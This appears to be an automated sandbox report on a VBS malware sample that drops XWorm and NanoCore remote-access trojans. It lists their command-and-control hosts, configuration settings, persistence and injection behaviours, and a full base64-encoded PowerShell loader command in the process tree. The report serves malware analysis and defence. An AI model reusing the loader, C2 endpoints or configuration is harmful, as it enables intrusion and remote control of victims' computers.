Analysis
-
max time kernel
134s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
29-08-2024 18:24
Static task
static1
Behavioral task
behavioral1
Sample
c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs
Resource
win7-20240704-en
General
-
Target
c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs
-
Size
2.3MB
-
MD5
1033c6b6d28d44c062806cf7d594e6f2
-
SHA1
74c6a8a092c267399e87e91abb7be13df725b046
-
SHA256
c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1
-
SHA512
2b8e1421f95b631843cdfdd1c6419f43a12dd523eef53bc513b889a685655d313cfde7db5169cf3d662b638ec032644e1c9b4c7a1c2e9a6b285545052b6673b0
-
SSDEEP
24576:bD/qEBZa71HU8t5t1brARP+rHHSjIPwSVs5fEEkhTb+jUTjs0oi6vXkkQW+pUFX8:vqyMTtMDjIYSi5MTCY3s0o2kQWCXKBo
Malware Config
Extracted
xworm
5.0
reserved2021whsjsr.mywire.org:7100
TDATvs0wpMfRfMfE
-
install_file
USB.exe
Extracted
nanocore
1.2.2.0
builderlloulirabaonline23rd.mywire.org:7077
127.0.0.1:7077
5a71ca6b-558e-46f1-b51d-f5c300aa04cd
-
activate_away_mode
true
-
backup_connection_host
127.0.0.1
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2024-05-20T07:18:37.133361836Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
7077
-
default_group
D-Online23rd
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
5a71ca6b-558e-46f1-b51d-f5c300aa04cd
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
builderlloulirabaonline23rd.mywire.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000a000000023399-1115.dat family_xworm behavioral2/memory/3444-1124-0x00000000002C0000-0x00000000002CE000-memory.dmp family_xworm -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1004 3988 cmd.exe 84 -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4364 created 3428 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 56 -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe -
Executes dropped EXE 2 IoCs
pid Process 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 3444 WORMreserved2021whsjsr.mywire.org 7100.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dvpubhhpn = "C:\\Users\\Admin\\AppData\\Roaming\\Dvpubhhpn.vbs" c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4364 set thread context of 4072 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 98 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ WScript.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 4072 InstallUtil.exe 4072 InstallUtil.exe 4072 InstallUtil.exe 4072 InstallUtil.exe 4072 InstallUtil.exe 4072 InstallUtil.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4072 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe Token: SeDebugPrivilege 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe Token: SeDebugPrivilege 4072 InstallUtil.exe Token: SeDebugPrivilege 3444 WORMreserved2021whsjsr.mywire.org 7100.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 920 wrote to memory of 4364 920 WScript.exe 91 PID 920 wrote to memory of 4364 920 WScript.exe 91 PID 920 wrote to memory of 4364 920 WScript.exe 91 PID 4364 wrote to memory of 3444 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 97 PID 4364 wrote to memory of 3444 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 97 PID 4364 wrote to memory of 4072 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 98 PID 4364 wrote to memory of 4072 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 98 PID 4364 wrote to memory of 4072 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 98 PID 4364 wrote to memory of 4072 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 98 PID 4364 wrote to memory of 4072 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 98 PID 4364 wrote to memory of 4072 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 98 PID 4364 wrote to memory of 4072 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 98 PID 4364 wrote to memory of 4072 4364 c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe 98
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3428
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Users\Admin\AppData\Local\Temp\c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe"C:\Users\Admin\AppData\Local\Temp\c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe" -enc JABDAHYAbwBrAGEAeQBrAHQAcAByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFoAegBuAGsAegB5AGYAbABnAGoAdwAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEMAdgBvAGsAYQB5AGsAdABwAHIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAQwBmAHgAegBpAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAWgB6AG4AawB6AHkAZgBsAGcAagB3AC4AUgBlAHAAbABhAGMAZQAoACcAUgBFAE0AIAAnACwAIAAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACAAJwBBACcAKQApADsAJABLAGMAeABwAHEAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAQwBmAHgAegBpAHMAIAApADsAJABHAGMAeQB3AGUAegB5AHAAZwBxACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABaAHEAdAB3AGcAbwBiAGoAeABkAHcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQASwBjAHgAcABxAHQALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAFoAcQB0AHcAZwBvAGIAagB4AGQAdwAuAEMAbwBwAHkAVABvACgAIAAkAEcAYwB5AHcAZQB6AHkAcABnAHEAIAApADsAJABaAHEAdAB3AGcAbwBiAGoAeABkAHcALgBDAGwAbwBzAGUAKAApADsAJABLAGMAeABwAHEAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEMAZgB4AHoAaQBzACAAPQAgACQARwBjAHkAdwBlAHoAeQBwAGcAcQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAQwBmAHgAegBpAHMAKQA7ACAAJABGAGgAegB4AHcAaQBoAHoAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEMAZgB4AHoAaQBzACkAOwAgACQAQQBkAGMAbwBqACAAPQAgACQARgBoAHoAeAB3AGkAaAB6AG4ALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAGQAYwBvAGoALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAZABjAG8AagAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Users\Admin\AppData\Local\Temp\WORMreserved2021whsjsr.mywire.org 7100.exe"C:\Users\Admin\AppData\Local\Temp\WORMreserved2021whsjsr.mywire.org 7100.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3444
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Windows\system32\cmd.execmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe" /Y1⤵
- Process spawned unexpected child process
PID:1004
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
32KB
MD58530aac64c7eae15a9e322ba01939297
SHA1ea4bd22364ac8598020b4834807656a69c286ec3
SHA25660d7df1282af530664475c64e172e40b04c052960be1ec73ad42156e11dccb0e
SHA512af490d5a0605925dad587248f3ef1148c4b7310ba2b648ed0e8b0f9032ae37371cd9043fa2afd035850302f6e19a6e5d312c49caab5a8da3c304d7a958ce73e5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\c6092b1788722f82280d3dca79784556df6b8203f4d8f271c327582dd9dcf6e1.vbs.exe
Filesize423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc